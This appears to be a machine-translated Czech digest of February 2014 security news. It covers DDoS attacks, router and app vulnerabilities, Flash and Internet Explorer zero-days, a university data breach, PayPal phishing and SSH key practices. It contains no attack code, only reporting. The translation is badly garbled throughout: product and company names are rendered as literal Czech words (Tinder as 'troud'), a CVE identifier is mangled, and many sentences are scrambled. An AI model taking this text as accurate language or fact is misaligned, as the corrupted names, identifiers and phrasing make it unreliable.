Qualys předseda představenstva a generální ředitel Philippe Courtot bude přednese projev na nadcházející konferenci RSA 2014 na čtvrtek 27 únor v 15:30 PT. Bezpečnostní odborníci v obecné nedůvěry cloudu, jsou obavy ze ztráty kontroly, fly-by-noční třetí Řešení stran, soukromí a sledování. Nicméně, cloud poskytuje způsob, jak řešit problémy, jako je zmizelého obvodu, všudypřítomných připojených zařízení a nových kategorií útoku. Tento keynote se bude diskutovat o tom, jak se můžeme posunout dynamický a použít cloud bránit proti zvýšení bezpečnostních výzev, před nimiž stojíme. Kromě klíčového zasedání, vedení a výzkumníci společnosti nabídne pohled na aktuální hrozby a trendy v odvětví souvisejících s bezpečností prohlížeče, zranitelnosti v rámci populárních embedded zařízení, a to, jak nejlépe řídit efektivní bezpečnostní programy napříč vládními agenturami a podniky. průběžného monitorování se 20 kritických bezpečnostních kontrol (SPO1-W02) Středy 26.února v 09:20 PT, Pokoj pro 131 V 20 Kritické Bezpečnostní kontroly (CSC) nastínit praktický přístup k provádění bezpečnostních technologií tím, že poskytuje osvědčené pokyny pro ochranu IT prostředí. Kontinuální monitoring hraje důležitou roli při provádění 20 CSC, a dobrou zprávou je, že tam jsou nové nástroje, které vám mohou pomoci automatizovat přijetí 20. CSC. Tato relace Wolfgang Kandek, CTO, Qualys, budou podrobně, jak používat tyto nástroje, ochranu firemních prostředí a aby se vaše data v bezpečí. Is Your Browser User Agent, nebo Double Agent (DSP-R04A) Úterý 27 únorem v 12:00 PT, Pokoj 2006 by Privacy nesmí být dodatečně v prohlížeči. Bezpečnost dat ve webových a mobilních aplikací se opírá o technických kontrol, jako je politika stejného původu a tzv. sandboxu. Jak prohlížečů přidat složitější funkce, musí průmysl zvážit kompromis mezi zlepšením API pro vývojáře a omezují schopnost útočníků zneužívat těchto rozhraní API. Tato prezentace Mike Semy, ředitel inženýrství, Qualys, se bude týkat ohrožení ochrany osobních údajů, které mohou aplikace setkávají prostřednictvím prohlížeče.


NameCheap DNS hit server s "novým typem" DDoS
28.2.2014 Počítačový útok
Populární registrátor domén a webhostingové služby si Vaši byl potíže s nečekaným DDoS útoku zaměřeného na 300 nebo tak domén na dvou svých svých DNS nameservery.

"Samotná velikost útoku zahlceni mnoha našich DNS serverů za následek nedostupnost a pomalý výkon. Naše původní odhady ukazují, že velikost útok na více než 100Gbps, dělat to jeden z největších útoků někdo viděl, nebo se týkají. A to je Nový typ útoku, který jsme my a naše hardwarové a síťové partneři dosud nesetkal, "si Vaši generální ředitel Richard Kirkendall a Vice President Matt Russell sdílené v příspěvku . útok začal kolem 15,55 GMT / 11.55 EST ve čtvrtek, a byl plně zmírnit o tři hodiny později, ale to trvalo nějakou dobu pro všechny DNS služby společnosti vrátit zpět do normálu. "Náš DNS platforma je nadbytečný, globální platforma se šíří přes 3 kontinentech a 5 zemí, které zpracovává DNS pro mnoho našich zákazníků. To je platforma pečlivě udržovány a běžel, a platforma, která úspěšně odrazí další DDoS útoky na téměř denně, "vysvětlil dva, ale dodal, že se stále snažil udržet své služby k dispozici zákazníkům. "Trvalo nám asi 3 hodin, aby plně zmírnění útoku, úzce spolupracuje s naším hardware a sítě dodavatelů, "oni dále sdílet, a oznamuje zlepšení, aby k podobným útokům v budoucnu:" Jsme předkládání klíčovou infrastrukturu programu vylepšení DNS, který bude vidět nás masivně rozšířit Velikost naší infrastruktury DNS a naši schopnost absorbovat a odrazit útoky, jako jsou tyto. " Velikost útoku není největší, kdo někdy viděl, jako 300 gigabitů za sekundu (ve špičce) DDoS byla zaměřena proti SpamHaus v loňském roce, a teprve nedávno Cloudflare odhalil jejich infrastruktura, které byly podrobeny jednomu dosažení 400 gigabitů za sekundu. Nicméně, DDoS útoky jsou stále vážnou obtíž, zejména proto, že útočníci začali využívat zranitelné servery NTP namontovat masivní reflexe útoků. To je ještě známo, zda servery NameCheap je byly hit s tímto konkrétním typu DDoS - ". nový typ útoku" Kirkendall a Russell jen řekl, že je Vzhledem k tomu, že NTP reflexe útoky nejsou tak nové a neznámé, Zajímalo by mě, jestli byli svědky další, dosud (do značné míry), neznámý a nepoužívaný typ útoku.


Bezpečnostní chyby nalezené v 80% nejprodávanější SOHO bezdrátových směrovačů
28.2.2014 Zranitelnosti
Tripwire analyzoval bezpečnost poskytované z nejoblíbenějších bezdrátových směrovačů používány v mnoha malých a domácích kanceláří a zjistil, že 80 procent z top 25 nejprodávanějších SOHO bezdrátových modelů routerů Amazon se chyby zabezpečení.

Z těchto ohrožených modelů, 34 procent veřejně zdokumentováno exploity, které dělají to relativně jednoduché pro útočníky k řemeslu buď vysoce cílené útoky nebo obecné útoky na každý zranitelný systém, které můžete najít. Směrovače jsou ideálním cílem pro cyberattackers, protože mohou být použity k odposlouchávat provoz poslal do a ze sousedních přístupových firmě bodů. Poté, co útočník získal kontrolu nad routeru, jsou schopni sledovat, přesměrovat, zablokovat nebo jinak manipulovat s celou řadou on-line aktivit. Jakmile router je ohrožena, zařízení hlídané routeru firewall stát cílů pro další útoky ze sítě. Dokonce i technicky orientované uživatele je obtížné určit bezdrátový router kybernetického útoku, protože router uživatelská rozhraní jsou minimální, a provoz poslal z ohrožení zařízení . cyberattackers je obvykle neviditelné nálezy Klíčové studie patří:

30 procent IT profesionálů a 46 procent zaměstnanců se nezmění výchozí heslo správce na svých bezdrátových směrovačů. S přístupem do konfiguračního rozhraní, útočníci mohou snadno ohrozit zařízení.
55 procent IT profesionálů a 85 procent zaměstnanců se nezmění výchozí adresu IP (Internet Protocol) na svých bezdrátových routerů, což Žádost o Cross-Site padělání (CSRF) útočí mnohem jednodušší pro cyberattackers.
43 procent IT profesionálů a 54 procent zaměstnanců pomocí Wi-Fi Protected Setup (WPS) - nejistý standardní, že je to jednoduché pro útočníci objevit routeru šifrování frázi, bez ohledu na jeho složitost a sílu.
52 procent IT profesionálů a 59 procent zaměstnanců neaktualizovali firmware na svých routerech na nejnovější verzi, takže i když bezpečnostní aktualizace od routeru dodavatelů jsou k dispozici, většina uživatelů neobdržíte dodatečnou ochranu.
Několik klíčových bezpečnostních postupů může pomoci uživatelům může účinně omezit Bezdrátový router kybernetickým útokům. Nicméně, studie Tripwire v bezdrátových bezpečnostních router postupů mezi IT profesionály a zaměstnanců, kteří přístup k podnikovým sítím ze vzdálených míst ukazuje, že tyto praktiky nejsou široce používány. "Vert v oblasti výzkumu a SANS nedávný objev The Moon červa v současné době infikování vystavené Linksys routery znamená, že ohrožení směrovače bude i nadále zvyšovat, jak škodlivé herci poznat, kolik informací lze získat tím, že napadne těchto zařízení, "řekl Craig Young, bezpečnostní výzkumník Tripwire. "Bohužel, uživatelé nemají změnit hesla výchozí správce nebo výchozí IP adresy v těchto zařízeních a Toto chování, spolu s převahou ověřování bypass zranitelnosti, otevírá dveře pro rozsáhlé útoky prostřednictvím škodlivých webových stránek, pluginy a smartphone aplikace, "dodal Young.


Růst a složitost mobilních hrozeb
28.2.2014 Mobil
Jako zaměstnanci nadále používat svá vlastní zařízení a osobní aplikace pro pracovní účely, další hrozby jsou zavedeny na pracovišti, čímž firemních sítí v ohrožení. Zpráva Webroot také poskytuje návrhy a osvědčených postupů, aby se snížilo riziko k firemním datům z mobilních zařízení zaměstnanců vlastnictví.

Klíčová zjištění patří:
Zvýšení celkových ohrožení Android zařízeními v 2013 384%.
42% Aplikace pro Android analyzovaných byly klasifikovány jako nebezpečné, nežádoucí nebo podezřelé.
Riziko infekce srovnání mezi platformami Android a iOS.
29,3% ze všech sledovaných infekcí SMS pramení z herních aplikací.
Nová zpráva, na základě údajů shromážděných podle Webroot Threat Research týmu, analyzovat více než 5,9 milionu mobilních aplikací (apps), 31000 infekce, téměř 125.000 Lost Protection Device aktivace a infekce ceny z milionů zákazníků. Zvýšené riziko je způsobeno tím, Škodlivé aplikace, včetně těch, které vyžadují zakořenění zařízení, posílat prémiové SMS zprávy, a shromažďovat všechny dostupné údaje. Zpráva zdůrazňuje, že je důležité, stahování aplikací z důvěryhodných zdrojů, jako je Google Play a iTunes. Mnoho app trhy třetích stran, se nevztahují přísné bezpečnostní normy a mohou nevědomky hostit škodlivé soubory. "Spotřebitelé jsou velmi důvěřiví mobilních aplikací, jako je Facebook, Twitter a Angry Birds -. jsou aplikace, které znají a používají nějakou dobu se však, že je to tisíce neověřených aplikací, často se nacházejí na trzích třetích stran nebo P2P sítí, které kladou uživatelům v ohrožení, "řekl Grayson Milbourne, bezpečnostní inteligence ředitel Webroot. "Zpráva ukazuje, že tato linie myšlení je nebezpečné, špatné volby app může vést k ohrožení celé podnikové sítě. bude potřeba zabezpečit mobilní zařízení i nadále růst jako objevení nových exploitů a škodlivých aplikací zvýšit, vše poháněno jasným zaměřením na mobilní platformy počítačové trestné činnosti v rámci komunity, "dodal Milbourne. proliferace mobilních zařízení, zejména osobních zařízení používaných v pracovním prostředí, známý jako "přinést svém zařízení" nebo BYOD-lze vystavit podnikové sítě k vyšším rizikem a pokračující růst platformy pro Android je zvláštního zájmu. Data ukázala téměř nárůst 4X objemu potenciálně ohrožuje aplikace pro Android v roce 2013, zatímco nedávná zpráva od Strategy Analytics uvedeno Android napájen 79 procent všech chytrých telefonů prodaných ve stejném období. A zároveň umožňuje tato zařízení pro přístup k produktivitu pomůcky firemní zdroje, zvýšený potenciál pro kompromis otevírá rizik vektor, pro který musí být pracovníci IT vzít v úvahu. Úplná zpráva je k dispozici zde.


Adobe opravuje Flash 0-day
28.2.2014 Zranitelnosti
Adobe vydala své druhé out-of-band aktualizace pro Adobe Flash tento měsíc. APSB14-07 řeší tři zranitelnosti v Adobe Flash, včetně chyby CVE-2014 do 0502, které se používají ve volné přírodě k útoku uživatelů se zlými úmysly prostřednictvím webové stránky. The 0-day chyba v přehrávači Flash CVE-2014-0502 byla objevena asi před týdnem by FireEye , které uvádí, že byl nalezen na třech webových stránkách, které jsou provozovány neziskovými institucemi. Naštěstí organizace, které jsou spuštěny nejnovější operační systémy a aplikační kód nejsou ovlivněny útoku. Chybí jim zranitelné komponenty, které umožňují útok přijít k úspěšnému závěru. Zejména útok potřebuje, aby se vyhnula ASLR, aby byla úspěšná, a proto se zaměřuje pouze na určité konfigurace:

Windows XP (což nemá ASLR)
Windows 7 s nainstalovanou Javu 1.6, který umožňuje pro ALSR bypass, ale Java 1.6 je EOL již a obecně náchylnější k jiným využije
Windows 7 s plně aktualizovanou verzi sady Office 2007 nebo Office 2010, také citlivé na jiné využije.
Naše doporučení je aktualizovat tak rychle, jak je to možné. Organizace, které provozují některé z výše uvedených organizací, je třeba to udělat tak rychle, jak je to možné, jiní mohou vrátit tuto opravu na normální plánu, ale je třeba si uvědomit, že útočníci mohou změnit své taktiky kdykoli zneužít další softwarové balíčky, které také únik paměťových míst. Společnost Microsoft aktualizuje poradní KB2755801 , která centralizuje aktualizace Flash v aplikaci Internet Explorer 10 a 11.. Uživatelé IE10 nebo IE11, stejně jako Google Chrome nemusíte aktualizovat Adobe Flash odděleně, ale místo toho je řešen prostřednictvím svých prohlížečů automaticky. Autor: Wolfgang Kandek, CTO, Qualys.


Přes nákladů, organizace přehlédnout nové hrozby
28.2.2014 Mobil
Nová generace neznámých bezpečnostních hrozeb vyplývajících z megatrendů a technologií, jako je BYOD, mobilita, cloud computing a používání internetu, stejně jako vnitřních akcí havarijního i škodlivý, představí organizace na mnoha nových rizik.

Podle globálního průzkumu zabezpečení společnosti Dell, nicméně, většina vedoucích IT po celém světě říkají, že nemají-li zobrazit tyto hrozby jako top obavy o bezpečnost a nejsou priorit, jak najít a řešit je v rámci mnoha míst původu. Ve skutečnosti, když byli respondenti požádáni, aby se na dlouhodobé priority, pouze 37 procent zařadil neznámé hrozby jako nejvyšší bezpečnostní obavy v příštích pěti letech. epidemie hrozby pocházejí ze všech obvodů, a to jak uvnitř, tak vně organizace, a jsou často skryté ve špatně nakonfigurovaná nastavení nebo oprávnění, a neúčinná správa dat, řízení přístupu a použití politiky. Globální průzkum bezpečnosti Dell předních bezpečnostních rozhodovací pravomocí veřejného a soukromého sektoru měřit jejich povědomí a připravenosti na této nové vlny hrozeb trápí bezpečnosti IT. Některá klíčová zjištění patří:
 

64 procent respondentů souhlasí s tím, že organizace bude muset restrukturalizovat / reorganizovat své IT procesy, a být více spolupráce s ostatními odděleními, aby zůstali před další bezpečnostní hrozby. Dotázaných ve Spojených státech, 85 procent uvedlo, je třeba tento přístup, kontrastující s Velkou Británií (43 procent) a Kanadě (45 procent), které byly alespoň přesvědčena, že by bylo nutné.
Téměř 90 procent respondentů věří, že vláda by měla být zapojena do určování kybernetické obranné strategie organizací ", a 78 procent ve Spojených státech se, že federální vláda hraje pozitivní roli při ochraně organizace před interními i externími hrozbami, které zdůrazňuje potřebu silného vedení a poradenství od organizací veřejného sektoru v pomoci zajistit soukromý sektor.
Dramatický nárůst počtu sociálního inženýrství, škodlivých a / nebo náhodné vnitřních útoků, stejně jako sofistikované, pokročilé přetrvávající hrozby znamená, že organizace je zranitelná ze všech směrů. Všechny zúčastněné strany musí okamžitě přijmout opatření pro posílení přístupu k body uvnitř i vně obvodu, a pomáhá uživatelům předcházet takovým útokům.
67 procent respondentů tvrdí, že se zvýšily finanční prostředky vynaložené na vzdělávání a školení zaměstnanců v uplynulých 12 měsících, 50 procent věří, že bezpečnostní školení pro nové i současných zaměstnanců je prioritou
54 procent se zvýšily výdaje na monitorování služeb v průběhu minulého roku, toto číslo vzroste na 72 procent ve Spojených státech.
Mezi rozhodovací pravomocí v oblasti IT dotázaných, BYOD, cloud a Internet byly hlavních oblastí zájmu bezpečnostních hrozeb. BYOD - značný počet respondentů zdůraznil mobility jako příčina porušení, se zvýšenou mobilitou a uživatelské volby záplavy sítí s přístupová zařízení, které poskytují mnoho cest k odhalení data a aplikace k riziku.

93 procent dotazovaných organizací, aby osobní zařízení pro práci. 31 procent koncových uživatelů přístup k síti na osobní zařízení (37 procent ve Spojených státech)
44 procent respondentů uvedlo, že se zavádějí politiky pro BYOD bezpečnost je velmi důležité v prevenci narušení bezpečnosti
57 procent zařadil zvýšené využívání mobilních zařízení, jako nejvyšší bezpečnostní obavy v příštích pěti letech (71 procent ve Velké Británii)
24 procent uvedlo, zneužití mobilních zařízení / operační systém zranitelností je příčinou narušení bezpečnosti.
Cloud - Mnoho organizací dnes používají cloud computing, případně zavedení neznámé bezpečnostní hrozby, které vedou k cíleným útokům na organizačních dat a aplikací. Výsledky průzkumu dokazují tyto Stealthy hrozby přicházejí s vysokým rizikem.
73 procent dotázaných hlásí jejich organizace v současné době používají mrak (90 procent ve Spojených státech)
Téměř polovina (49 procent) zařadil zvýšené využívání cloudu jako nejvyšší bezpečnostní obavy v příštích pěti letech, což naznačuje, neklid pro budoucnost, protože pouze 22 procent uvedlo, přesunu dat do cloudu byl nejvyšší bezpečnostní problém dnes
V organizacích, kde bezpečnost je hlavní prioritou pro příští rok, 86 procent jsou pomocí cloud
21 procent uvedlo, cloud aplikace nebo využití služby jsou příčinou jejich porušení bezpečnosti.
Internet - význam neznámých hrozeb, které vyplývají z těžké použití internetové komunikace a distribuovaných sítí svědčí i 63 procent respondentů, kteří zařadil větší spolehnutí na internetu a aplikací založených na prohlížeči jako top znepokojení v příštích pěti letech.
Více než pětina respondentů považuje infekci z nedůvěryhodného vzdáleného přístupu (veřejné Wi-Fi), mezi prvními třemi se týká zabezpečení pro jejich organizaci
47 procent identifikovat malware, viry a útoky často k dispozici prostřednictvím webových aplikací, OS záplatování otázky, a dalších faktorů zranitelnosti aplikací souvisejících jako příčiny porušování
70 procent se v současné době používá zabezpečení e-mailu, aby se zabránilo outsider útoky k síti přes jejich e-mailové kanálu.
Průzkum ukázal, že 76 procent z IT vůdci dotazovaných (93 procent ve Spojených státech), se shodují, že v boji proti dnešním hrozbám, organizace musí chránit sám sebe a to jak uvnitř, tak vně jejích obvodů. To vyžaduje nejen komplexní sadu řešení, která chrání zevnitř ven a zvenku v - z koncového bodu, do datového centra do cloudu ─, ale ten, který také spojuje tyto schopnosti poskytnout hlubší vhled a silnější Predictive Analytics, aby strategické opatření mohou být přijata rychle.


Mobilní hrozby po celém světě
28.2.2014 Mobil
2013 byl rokem změn ve světě mobilních hrozeb. Kampaně se stále více terčem zločinců přizpůsobily své postupy s cílem maximalizovat zisk a působí pod radarem. V místech, kde regulace je těžké, zločinci klesl více tradiční zpeněžení strategie, jako je podvod premium rate SMS a spekulativních "šedé zóně", taktiky, které jsou vlastně legální.

Mobilní hrozby encounter ceny po celém světě:
USA - 30,38%
UK - 37.72%
Čína - 48,2%
Rusko - 75,42%
Po letech iterace a postupně mění kód a taktiky, v 2013 vzorcích bylo jasné, v mobilních hrozeb průmyslu. Nuceny soutěžit při práci se vyhnout detekci policie nebo bezpečnostních firem -. Mobilní zločinci se začala specializovat povolena šířit nekontrolovaně, adware dosáhl vrcholu v roce 2013, se šíří do všech koutů světa. Jste pětkrát větší pravděpodobnost, že narazíte na adware, než jste malware. V září, Google aktualizoval Play Store podmínky, odstranění asi 36.000 aplikací, které obsahují reklamní sítě, které porušil pravidla. Dopad byl okamžitý. Ve 3. čtvrtletí roku 2013 adware sazby začaly klesat. Snímek Encounter Ceny pro mobilní hrozby v USA

25% lidí se setkal adware na svém telefonu - hlavní hrozbou pro uživatele v USA
5,3% lidí se setkal chargeware - druhý největší hrozbou pro uživatele v USA
Malware je stále relativně nízká u 4,22% - díky důvěryhodným app obchody a silnou regulační prostředí.


Oversharing

28.2.2014 Bezpečnost

 o "podivnou UDP z celého", že on byl najednou viděl ve svém logu firewallu, jsme nejprve předpokládal, že jeho připojení k Internetu se "zdědil" dynamickou IP adresu, která předtím byla používaný bující souboru sdílení uživatele, a že Michael byl nyní vidět "po záři".

Stále požádal o PCAP (tcpdump) podat i když, a když jsme se podívali na to, co Michael poslán zpět, viděli jsme k našemu překvapení ...

... Že síť Michaelova reagoval na provoz. Hmm. Jejda!

Bližší dotaz pak ukázalo, že nedávno aktualizoval firmware na jejich QNAP TS-659 NAS (síťové úložiště) serveru .. a tato nová verze přišla s možností působit jako média a streamovací server. Není zcela jasné, zda odpovídající funkce byla "o" ve výchozím nastavení, nebo byl zapnut náhodou. Ale jakmile se vypne, "zvláštní UDP" zastavil hned.

Poučení - po upgradu, zkontrolujte, zda jsou věci stále, jak můžete očekávat, že budou. Zatímco většina výrobců se naštěstí naučili, aby se nové "funkce" ve výchozím nastavení vypnuta, nelze zcela spoléhat na to. Pro domácí použití, investovat do malé sítě kohoutku nebo rozbočovači, a tu a tam zkontrolovat provoz opustit svůj dům, je (a) dobrou bezpečnostní opatření, a (b) pomáhá udržovat aktuální své dovednosti Wireshark Packet-Fu :)

A když už jsme u tématu NAS a úložných serverů: CERT zranitelnost poznámka dnes vydala se uvádí, že některé verze Synology DiskStation může obsahovat pevný kódované heslo, které mohou být použity vzdálenému útočníkovi vytvořit VPN do stanice DiskStation. Přál bych si, prodejci - výrazně včetně Cisco - by se jejich pípání dohromady, a po letech "bezpečnostní zprávy" na toto téma, nakonec přestat dodávat výrobky s tvrdými kódovaných pověřovací / zadní vrátka! Podrobnosti o Synology nepořádek zde: http://www.kb.cert.org/vuls/id/534284


Téměř 310,000 ovlivněn University of Maryland porušení

28.2.2014 Incidenty
University of Maryland je nejnovější instituce vyššího vzdělávání, aby trpěli porušení dat značného rozsahu a rozměrů, jak byly zkopírovány a exfiltrated ze svých sítí téměř 310.000 záznamů pracovníků a studentů. "zvláštní databázi záznamů vedených podle našeho IT oddělení bylo porušil včera. Tato databáze obsahovala 309.079 záznamy fakulty, zaměstnanců, studentů a přidružených pracovníků z College Park a Shady Grove areálech, které byly vydány v univerzitní ID od roku 1998, "Wallace D. Loh, univerzitní prezident vysvětlil v prohlášení zveřejněném . na internetových stránkách ve středu "se záznamy zahrnuté jméno, rodné číslo, datum narození, a Univerzitní identifikační číslo Žádné jiné informace byly ohroženy -. žádný finanční, akademické, zdraví, nebo kontakt (telefon, adresa) informace." Podle Diamondback , porušení došlo v úterý mezi 4 a 5 hodin, a byla zjištěna mezi 8 a 9 hodin téhož dne. Brian Voss, univerzitní viceprezident informačních technologií, sdílené, že útočníci se neobtěžoval s pozměňování dat sítě univerzity. Také, že zřejmě byly velmi schopný. "pracoval někdo kolem velmi přísné bezpečnostní a získal přístup k těmto údajům. Ten, kdo se to zlomil přes několik úrovní zabezpečení, aby bylo možné získat tento soubor, "řekl Voss, a poukázal na to, že porušení nebylo úspěšné, protože někdo nechal otevřené dveře, nebo udělal chybu. "Univerzity jsou zaměření na dnešních globálních útoků na IT systémy. Nedávno jsme zdvojnásobili počet našich bezpečnostních techniků IT a analytiků. Jsme také zdvojnásobila své investice do nástrojů zabezpečení top-end. Je zřejmé, že je třeba udělat více a lépe, a my, "komentoval Loh. "Počítačová forenzní vyšetřovatelé zkoumají porušené soubory a protokoly s cílem určit, jak byly naše sofistikované, multi-vrstvené bezpečnostní obrany obešel." prosazování práva byla rovněž zahrnuta v šetření. Univerzita má v úmyslu nabídnout jeden rok zdarma úvěrového monitoringu všech dotčených osob, a varoval je, aby pozor na phishing e-maily a telefonáty, které by mohly vydávat se na univerzitu, a požádat je, aby sdílet osobní a finanční informace.


Prvotřídní phishingové e-mailové tvrzení "Váš Paypal transakce byla odmítnuta"
28.2.2014 Phishing

Velmi dobře vyrobené falešné oznámení odvolávají PayPal transakce příjemců byla odmítnuta dělají kola a snaží se přimět uživatele sdílení osobních a finančních informací. email - dobře formátovaný a sportovní logo PayPal - vysvětluje, že "neobvyklou aktivitu" z "podezřelé lokality "byl spatřen v úvahu příjemců, což je přesvědčen, že" někdo se pomocí svého PayPal účtu bez vašeho vědomí. " To pak pokračuje říkat, že nejlepší způsob, jak vyřešit tento problém a vyhnout se opět děje, je ke stažení v příloze dokument, otevřete ji v prohlížeči, a postupujte podle pokynů. Ti, kteří dodržování těchto pokynů budou přijata na prostřednictvím řetězce zfalšovaných stránkách PayPal.

První je přihlašovací stránka, pak okno pro zadání příjemce zadejte osobní údaje (jméno, rodné příjmení matky, datum narození, adresa), následuje stránky vyžadující bankovní účet a informace o kreditních kartách, a konečně stránka "potvrzení" . Konečně, oběť je přesměrován na skutečné stránkách PayPal. "Falešné formy i provádět základní kontrolu chyb, aby zajistila, že oběti mají vstup správné typy dat," Hoax-Slayer bere na vědomí , poukazuje na to, že tento druh sofistikovaných pokusů o phishing mohl i trik další počítačové gramotnosti uživatelů - "zvláště jsou-li obsazeno nebo unavený." Pokud jste někdy obdržíte e-mail, jako je tento, ignorovat ho, nebo ještě lépe, oznámit PayPal o tom. A pokud máte strach, váš účet byl ohrožena, ujistěte se, že záležitost prošetří tím, že půjdete na legitimní webové stránky PayPal (rozhodně ne po odkazu na něj) a přihlášení odtud.


Problémy Microsoft Fix it kritické IE 0-day využívány při útocích
28.2.2014 Zranitelnosti

Microsoft konečně vydala bezpečnostní poradenství zabývající IE zero-day, která byla v nedávné době aktivně využit v útocích ve volné přírodě , a následoval s Fix It nástroj dočasně zmírnit problém, dokud nebude vydána oprava. Tento zero-day je vzdálené spuštění kódu, která může poškození paměti a umožňuje útočníkovi spustit libovolný kód v kontextu aktuálního uživatele v aplikaci Internet Explorer. Tato chyba je snadno spouští, a vyžaduje, aby cíle jednoduše návštěvě speciálně vytvořené webové stránky hosting využívat, nebo webové stránky, které přijímají nebo hostující materiál poskytovaný uživateli obsah nebo reklamy, které bya mohly tuto chybu zabezpečení zneužít. Je to jen otázka láká uživatele na takovém místě. pouze Internet Explorer 9 a Internet Explorer 10 arů touto chybou zabezpečení ohroženy -. přestože puntíkovaný útoky soustředily na kompromisu pouze IE 10 uživatelů IE verze 6, 7, 8 a 11 nejsou dotčena a Microsoft radí uživatelům, aby se ochránili upgradem na nejnovější verzi zpřístupněna. Ti, kteří nemohou aktualizovat v tomto okamžiku, můžete si stáhnout konkrétní spravit nebo instalovat Enhanced Experience Toolkit pro zmírňování (Emet), jak využít zabraňuje sám z provozu, pokud zjistí, Emet na cílovém počítači. "Na dokončení tohoto šetření, bude společnost Microsoft proveďte příslušnou akci k ochraně našich zákazníků, které mohou zahrnovat poskytování řešení prostřednictvím naší měsíčně vydávané aktualizace zabezpečení, nebo out-of- cyklu aktualizací zabezpečení, v závislosti na potřebách zákazníka, "došli k závěru.

 

 

Major zranitelnost v troud datování app povoleno sledování uživatelů
28.2.2014 Zranitelnosti

Zahrnout Security představila nový výzkum ukazuje, že uživatelé populární online dating app troud byly významným rizikem kvůli zranitelnosti objevili v geo-umístění funkce aplikace. Tato chyba zabezpečení dovolil uživatelům troud sledovat každý další je přesné umístění pro hodně z roku 2013.

Vědci poprvé objevili chybu a nahlásil na troud loni na podzim, citovat, že chyba zabezpečení umožňuje každému uživateli Tinder najít místo jiného uživatele, pokud aplikace Tinder běží, nebo jejich poslední známé místo, pokud ne. Použití algoritmu s názvem trilaterace, výzkumných pracovníků byli schopni získat přesné zeměpisné šířky a délky koordinuje pro všechny uživatele troud. Každý, kdo s primitivní znalosti programování by mohlo dotaz troud API přímo a strhnout souřadnic každého uživatele. To vedlo k porušení ochrany osobních údajů pro uživatele aplikace. Erik Cabetas, managing partner a zakladatel Zahrnout řekl Security "Vzhledem k troud architektury, to není možné, aby jeden uživatel Tinder vědět, pokud jiný využil této zranitelnosti v průběhu Doba expozice. Následky zranitelnost tohoto typu byly všudypřítomné vzhledem troud masivní globální základnu uživatelů. Jakmile se náš výzkumný tým objevil, jsme informovali zranitelnost přímo na troud a navázala několikrát mezi říjnem a prosincem 2013 bylo zajištěno, že jsou řešení problému. " V určitém bodě v období mezi prosincem a začátkem ledna, Tinder dělal vydat opravu tohoto problému. "Jak více a více aplikací jsou postaveny obsahovat geo-lokalizační služby, je zde zvýšené riziko pro soukromí a bezpečnost Uživatelé, "dodal Cabetas. "Aplikační prodejci a vývojáři mají odpovědnost za zajištění soukromí svých uživatelů, a bezpečnosti je chráněna, zranitelnosti jsou sděleny okamžitě, a priorita je věnována rozvoji důležité opravy, jako je tento." Tady je video z zranitelnosti v akci:


96 procent z aplikací mají bezpečnostní chyby
28.2.2014 Bezpečnost | Zranitelnosti

Zlepšení záplat a bezpečných kódovacích postupů udělali mírný vliv na výskyt slabých míst, podle nové zprávy Cenzic.

Nicméně, vznik BYOD, cloudových služeb a mobilních aplikací - a pokračoval selhání organizací odhalit a řešit využije kolem úniku informací, autentizace a autorizace, a správu sezení se držet zranitelnosti téměř všudypřítomný. Ve skutečnosti, střední počet zranitelností na aplikace - 14 - je ve skutečnosti větší, než tomu bylo v předchozím roce - 13. Zpráva odhalila širokou škálu poznatků, pokud jde o aplikační zranitelnosti, včetně:

Trvalý nárůst výskytu bezpečnostní chyby v mobilních aplikacích. Zpráva zjistila, že porušení soukromí a nadměrné výsady se objeví ve více než 80 procent mobilních aplikací.
Zvyšující se výskyt zranitelnosti nalezené v aplikacích sdíleny s třetími stranami. Cloud poskytovatelé služeb a partnery v dodavatelském řetězci, které mohou být mimo sféru organizace vlivu jsou hlavním zdrojem hrozeb dnes.
Únik informací je způsobena zranitelných aplikací. Kolem 23 procent zranitelností byly v souvislosti s únikem informací, ve kterém aplikace nevhodně odhaluje citlivá data, jako jsou technické informace o aplikaci nebo data specifická pro uživatele.
Problém prastarý of Cross-Site Scripting (XSS) je stále na vině. Některé 25 procent zranitelností byly v souvislosti s cross-site scripting (XSS), ve kterém aplikace umožňuje útočníkům posílat škodlivé skripty předávání skript z jinak důvěryhodné adresy URL.
Smíšené zranitelná místa v jiných oblastech, nemůže být ignorována. Nedostatky v ověřování a autorizace tvoří 15 procent zranitelností, a chyby řízení relace tvořily 13 procent.
Mnoho z dnešních slabých míst - dokonce i ty, které jsou relativně nové - lze předcházet. Cenzic nastínil některé klíčové osvědčené postupy připomínat podniky některých jednoduchých řešení, která mohou pomoci zabezpečit jejich aplikace: . realizovat bezpečné postupy psaní kódu Jedná se o techniky používané vývojáři aplikací odvrátit potenciální narušení bezpečnosti. Konzistentní, kvalitní kódovací postupy jsou nejúčinnější odrazující prostředek vůči útokům. Použití firewallů pro webové aplikace (Wafs). Wafs umožňuje blokování na základě zásad konkrétních zranitelností, které existují v aplikacích, bez přepisování kódu aplikace. Wafs jsou zvláště efektivní metoda pro rychlé zablokování chybu našel v aplikaci produkce, aniž by bylo nutné plně re-vydání žádosti obsahující zranitelnosti. zajistit správné konfigurace serveru. To je řada postupů pro správu serveru hardwaru, operačních systémů a Osvědčení o bezpečnosti na zařízení se systémem konkrétní aplikaci.


60% podniků opírajících se o administrátoři self-policejní SSH klíčů
28.2.2014 Šifrování

Podniky tolerovat chyby zabezpečení tím, že otevřené dveře, přístup na úrovni kořenového adresáře, podle nové zprávy Ponemon Institute. 46% z 1854 respondentů jejich servery a sítě jsou ponechány otevřené a mohou být vlastněny navždy útočníky, protože se jim nepodaří otočit SSH klíče. Není divu, že 51% organizací uvedlo již porušena útokem pomocí SSH. Tento otvor v podnikové bezpečnosti neprošla bez povšimnutí. Nedávno odhalil provoz Maska krade SSH klíče vydávat, sle, sbírat, a dešifrovat komunikaci svých cílů "a data. Pokud SSH klíče jsou nahrazeny po průniky, jako masky útoky, podnikové sítě zůstávají ve vlastnictví útočníků. Výzkum Ponemon také zjistil, že 60% ​​organizací se nepodařilo odhalit nepoctivé SSH klíče na svých sítích, protože správcům systému self-policejní SSH klíče pomocí manuální procesy. "Často se podíváme na širokou škálu různých bezpečnostních IT problémy, které mají dopad globální organizace. Tato studie vyniká jak to ukazuje poškození, které jeden, nechráněný SSH klíč může způsobit, "řekl Dr. Larry Ponemon, předseda a zakladatel Ponemon Institute. "Ačkoli SSH klíče zabezpečení IT technologií, které jsou často neřešení v rukou široké škály správce, které nejsou v teorii nebo praxi, odborníků v oblasti bezpečnosti IT. Toto malé špinavé tajemství, odhalila průzkumu, je dalším důkazem, že kořen přístup k 